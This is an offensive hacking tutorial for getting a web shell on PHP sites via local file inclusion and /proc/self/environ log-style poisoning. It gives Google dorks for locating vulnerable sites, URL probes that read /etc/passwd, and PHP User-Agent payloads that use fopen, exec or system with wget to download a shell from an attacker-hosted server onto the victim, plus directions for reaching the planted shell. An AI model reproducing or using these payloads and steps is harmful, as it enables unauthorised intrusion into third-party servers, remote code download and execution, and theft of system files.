Shell Via LFI And /Proc/Self/Environ

This attack needs 3 main things to get it done

• Shell --> You can find shells here
• User Agent Switcher Addon --> For Chrome or FireFox
• Hosted Website that allows PHP --> 000WebHost, Zymic, 110MB

Here are some google dorks to find the vulnerability :

inurl:index.php?id=
inurl:index.php?cat=
inurl:index.php?action=
inurl:index.php?content=
inurl:index.php?page=

Now we have to create a new user agent and put in User Agent field the following code :

<?php phpinfo(); ?>

Description field is the name of the user agent so put what ever you want like this :



and for other fields remove them, so now create another user agent and in User Agent field put the one following codes but i will use the first one :

<?php $file = fopen("urshellname.php","w+"); $stream = fopen ("http://ursitename.com/urshellname.txt", "r"); while(!feof($stream)) {  $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>

<?exec ('wget http://ursitename.com/urshellname.txt -O urshellname.php');?>

<?system('wget http://ursitename.com/urshellname.txt -O urshellname.php');?>

it should look like this :



Remmember to change the path in the code to your site and when you upload your shell it must be in .txt not .php format so that the code can read & excute it.

To check if website is vulnerable write ../ in after the paremeter like this

http://www.site.com/index.php?id=../

and if you got [function.include] then the website may be vulnerable.
So after getting the error remove ../ and replace with it /etc/passwd like

http://www.site.com/index.php?id=/etc/passwd

if you got another [function.include] then add ../ until you got many text ( http headers ) then the site is vulnerable so after you find the passwd file we have to replace /etc/passwd it to be

/proc/self/environ

so the url will be something like this

http://www.site.com/index.php?id=/proc/self/environ

now change your user agent to the first created user agent that contain <?php phpinfo(); ?> and reload the page , if you got a text similar to PHP VERSION then the site has excuted the code.

So Uploading the shell is the easy same as the above one we have to change our user agent to the second one we created and remmember to fix the paths in your user agent and reload the page.

To access your shell go to

http://www.site.com/index.php?id=urshellname.php

and if that didn't work then try this

http://www.site.com/urshellname.php

And now you have gain access to the server and uploaded your shell successfully.